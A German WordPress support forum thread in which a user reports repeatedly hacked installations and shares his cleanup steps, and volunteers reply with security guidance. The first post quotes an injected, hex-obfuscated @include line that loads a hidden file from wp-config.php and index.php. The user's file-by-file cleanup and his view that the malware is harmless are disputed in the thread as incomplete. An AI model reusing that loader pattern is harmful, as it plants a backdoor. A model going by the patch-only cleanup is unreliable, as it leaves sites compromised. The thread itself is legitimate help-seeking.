• Gelöst HolgerGr

    (@holgergr)


    Hallo,

    ich melde mich hier mal, weil ich auf ein paar (längst nicht allen) WP-Installationen ein wiederkehrendes Problem habe: Sie werden offensichtlich regelmäßig gehackt, aber ich weiß nicht, ob von innen oder außen.

    Zunächst war es mir gar nicht aufgefallen. Meist machen diese Veränderungen an den WP-Dateien keine Auffälligkeiten. Bei der letzten Installation allerdings schon. Da ging plötzlich der Medienbrowser nicht mehr, es ließen sich keine weiteren Themes mehr hinzufügen und Elementor gab einen 500er Serverfehler aus, funktionierte danach aber stets reibungslos.

    Zuerst dachte ich, es hinge mit dem Update auf 6.3. zusammen und habe 6.2.2 zurück installiert. Danach lief erst einmal alles wieder. Am nächsten Tag das gleiche Problem. Lag also eher nicht am Update.

    Dann stellte ich fest, dass die wp-config und die index.php folgenden Code enthielten:

    /bdf59/

    @include („/var/www/vhosts/host\x2da.de/team.host\x2da.de/w\x70\x2dincludes/blocks/file/.f568af4f.otc“);

    /bdf59/

    Es gibt dieses Verzeichnis jedoch gar nicht auf meinem Server.

    Zudem werden haufenweise Verzeichnisse und Dateien angelegt, die teilweise html-texte und teilweise verschlüsselten code enthalten. Lösche ich sie und überschreibe wp-admin und wp-includes mit einer sauberen Version, ist das Problem für einige Stunden behoben. Es kommt aber wieder.

    Es sind stets die Subdomains von zwei meiner Domains betroffen.

    Eingrenzung des Problems:

    Es liegt nicht an Plugins und Themes. Ich arbeite meist mit oceanwp und nur einer handvoll Plugins. Ich habe mehrfach mein Adminpassword geändert.

    Wäre echt cool, wenn jemand wüsste, was das ist.
    Danke und Grüße
    Holger

Ansicht von 7 Antworten – 1 bis 7 (von insgesamt 7)
  • Hallo @holgergr

    Wenn deine Website Malware enthält, solltest du sie schleunigst vom Netz nehmen oder einen .htaccess-Passwort-Schutz davor setzen.

    Für weitere Hilfe:
    https://de.wordpress.org/support/topic/seite-gehacked-was-tun/

    und bitte lies dazu auch

    Hacker interessieren sich nicht für Ihre Website – wirklich?

    Wieso eine gehackte Website Sie persönlich betrifft

    „Kleine“ Checkliste für die Sicherheit`

    Es gibt so einige Dinge, die man mit einer gehackten Website machen kann und damit der Angreifer nach einem erfolgreichen Hack immer Zugriff auf den Server hat, werden oft Backdoors eingerichtet, also Malware die ein Hintertürchen zur Anmeldung hinterlässt. Die ist oft schwer aufzuspüren und kann sich auch in vermeintlichen .jpg- oder.png-Dateien verstecken. Für eine Säuberung reicht es dann nicht, einzelne Dateien zu löschen.

    In den von Angelika genannten Beiträgen findest du Hinweise, wie du eine Website wiederherstellen kannst. Die WordPress-Community bietet außerdem Hinweise, wie du anschließend deine Website zusätzlich absichern kannst. Da einige Punkte davon nicht ganz trivial sind, kann es sinnvoll sein, einen Profi zu beauftragen, der sowas täglich (oder zumindest öfters) macht und weiß, auf welche Stolperfallen zu achten ist.

    Hallo @pixolin

    (s. vorherigen Post von mir) in diesem Beitrag
    https://de.wordpress.org/support/topic/seite-gehacked-was-tun/

    wird (u. a.) auf diesen Artikel verwiesen
    https://codex.wordpress.org/de:WordPress_absichern

    der eine (etwas ältere = Codex) Übersetzung des von dir verlinkten Artikels (zusätzlich absichern) ist, dafür ist sie auf Deutsch 🙂

    Thread-Starter HolgerGr

    (@holgergr)

    Hallo,

    ich habe nun die Lösung gefunden und da nur allgemeine Informationen kamen, die nicht wirklich weiter halfen, möchte ich gerne erzählen, wie ich die Plagegeister wieder losgeworden bin.

    Zunächst einmal wurde auf Wordfence verwiesen. Das habe ich installiert und dann bemerkt, dass es in der kostenlosen Version unbrauchbar war. Mit Ninja Scan habe ich dann ein anderes, kostenloses Scantool gefunden, das mir anzeigte, wo die Plagegeister alle saßen. Ich hatte stets einige übersehen und die haben dann wie ein Backdoor funktioniert.

    Zunächst einmal infiziert die Malware (von der ich immer noch nicht weiß, wie sie überhaupt auf den Server gelangt ist) die index.php in allen Verzeichnissen, die sie finden kann, sowie die wp-config.php Sie schreibt dazu den o.a. Code direkt unter das php-Tag.

    Zweitens infiziert sie zahlreiche Dateien in der wp-admin und wp-includes.

    Drittens verändert sie (seltsamerweise) ein paar css-Datein von Plugins indem sie ganze Anweisungsblöcke löscht.

    Vierterns legt sie ein Schein-Plugin an

    Fünftens legt sie ein Schein- Theme an.

    Nachdedm also die Index.php, die config.php etc. gesäubert wurden, habe ich das Schein-Theme und das Schein-Plugin gelöscht. Die css-Dateien hat mir freundlicherweise Ninja Scan repariert.

    Dann wp-admin und wp-includes löschen und saubere Versionen hochladen. Achtung! Vorher unter wp-includes/version.php die aktuell verwendete Version auslesen, sonst gibt’s Probleme.

    Übrigens: Der letzte Schritt sollte der erste sein, falls Ihr mit Ninja Scan arbeiten wollt, denn mit den infizierten Versionen bricht der Scan ab.

    Übrigens führte die Infektion nicht zu einer Blacklistung. Virustotal fand die Seite auch total unauffällig. Über den Browser wurde nichts ausgeliefert und nichts ausspioniert. Es scheint, als sei die Malware eine reine Webmaster/Serveradmin Beschäftigungstherapie.

    • Diese Antwort wurde geändert vor 1 Jahr, 3 Monaten von HolgerGr.
    • Diese Antwort wurde geändert vor 1 Jahr, 3 Monaten von HolgerGr.

    Hallo,
    danke für die umfangreiche Beschreibung. Ob damit dann wirklich alle Lüken geschlossen sind, kann ich nicht beurteilen.
    Ich verwende bei WordPress-Instanzen auch gerne das Plugin NinjaFirewall, das von den gleichen Entwicklern kommt, die NinjaScanner – Virus & Malware scan erstellt haben.

    Denkst du bitte beim nächsten Mal daran, das Thema dann auch als gelöst zu markieren, wenn das Thema für dich erledigt ist. Danke.
    Gelöst
    Die Option findest du rechts in der Sidebar. Das habe ich jetzt schon gemacht.

    Viele Grüße
    Hans-Gerd

    „ich habe nun die Lösung gefunden und da nur allgemeine Informationen kamen, die nicht wirklich weiter halfen, möchte ich gerne erzählen, wie ich die Plagegeister wieder losgeworden bin.“

    Und was hast du erwartet? Dass wir deinen Rechner bereinigen? Oder wir wissen, welche Sicherheitslücken du offen gelassen hast?

    Die Anleitung, die du allgemein nennst, wurde von erfahrenen und langjährigen WordPress-Core-Entwicklern erstellt. Es stimmt auch einiges nicht, was du geschrieben hast z. B.:

    „Zunächst einmal wurde auf Wordfence verwiesen.“

    Sondern es wurden direkt am Anfang mehrere Optionen genannt:

    When scanning your website you have a few different ways to do this, you can use external remote scanners or application level scanners. Each are designed to look and report on different things. No one solution is the best approach, but together you improve your odds greatly.

    Application Based Scanners (Plugins):

    Remote Based Scanners (Crawlers):

    There are also a number of other related security plugins available in the WP repo. The ones annotated above have been around a long time and have strong communities behind each of them.

    „Forensik“ steht bei gehackten Websites in Arbeitsaufwand und damit verursachten Kosten in keinem Verhältnis zu einer direkten Säuberung der Website. Bei der Untersuchung „was wurde eigentlich geändert und wodurch ist meine Website gefährdet“ wird schnell eine Backdoor übersehen und du fängst nach einer vermeintlichen Bereinigung wieder von vorne an, während deine Webseitenbesucher unter Umständen weiter einer Gefährdung ausgesetzt sind.

    Die einschlägigen Artikel (z.B. How to Clean a Hacked WordPress Site using Wordfence, WordPress Gehacked: Was tun, wenn deine Webseite in Schwierigkeiten ist?) raten deshalb dazu, die Website zuerst vom Netz zu nehmen (und damit eine Gefährdung von Webseitenbesuchern auszuschließen), alle Dateien vom Webserver zu löschen (um damit auch Skripte mit unauffälligen Namen wie defaults.php oder settings.php zu entfernen), WordPress-Core, -Themes und Plugins in der neuesten Version aus dem WordPress-Repository zu übertragen (und damit saubere Dateien zu reproduzieren) und zuletzt die eigenen Medien-Uploads sehr gründlich auf Malwarebefall zu prüfen, bevor auch diese wiederhergestellt werden. Zusätzlich sollte die Datenbank auf nachträglich angelegte Benutzer und JavaScript-Malware geprüft werden. Dass alle Zugangsdaten geändert werden müssen, versteht sich von selbst. Einzelne Dateien zu patchen („nachdem also die Index.php, die config.php etc. gesäubert wurden …“) ist nicht die richtige Vorgehensweise.

    Die Aussage „Zunächst einmal wurde auf Wordfence verwiesen.“ passt zumindest nicht auf die Antworten hier in diesem Thread. Ich sehe All-in-One-Sicherheitsplugins grundsätzlich kritisch, weil sie schnell ein trügerisches Sicherheitsgefühl vermitteln und Einsteiger sich von der Fülle an Informationen rasch überfordert fühlen. Dass Wordfence „in der kostenlosen Version unbrauchbar“ wäre, stimmt so pauschal allerdings auch nicht. Wordfence nimmt tatsächlich einige Einstellungen vor, die eine Website weiter absichern.

    Die Aussage „Es scheint, als sei die Malware eine reine Webmaster/Serveradmin Beschäftigungstherapie.“ sehe ich ebenfalls eher kritisch. Selbst wenn sich manche Angriffe mit einem Defacement begnügen, steckt oft versteckter Code in den neu angelegten Dateien, der einen Zugriff z.B. für ein Bot-Netz zu einem beliebigen späteren Zeitpunkt ermöglicht – dann geht der Ärger entweder erst richtig los oder du merkst einfach nicht, dass dein Server z.B. für DDOS-Attacken genutzt wird. Ein Angreifer macht sich kaum so viel Mühe, eine Website zu hacken, um nur den Administrator zu necken (obwohl sich das hübsch reimt).

    Ergänzend auch an dieser Stelle noch einmal der freundliche Hinweis, dass wir hier (übrigens kostenlos und in unserer freien Zeit) Hilfe zur Selbsthilfe anbieten. Angelika hat in ihrem Beitrag bereits richtig umschrieben, dass es eine falsche Erwartungshaltung wäre, dass wir deinen Server prüfen und bereinigen. Wir sind keine billigen kostenlosen Dienstleister, sondern erfahrene Anwender/-innen, die ihr Wissen gerne mit anderen in der WordPress-Community teilen. Die „allgemeine Informationen“, die wir verlinkt haben, hätten vielleicht geholfen, wenn du dir die verlinkten Beiträge auch einmal durchgelesen hättest.

Ansicht von 7 Antworten – 1 bis 7 (von insgesamt 7)
  • Das Thema „WordPress Installationen ständig gehackt“ ist für neue Antworten geschlossen.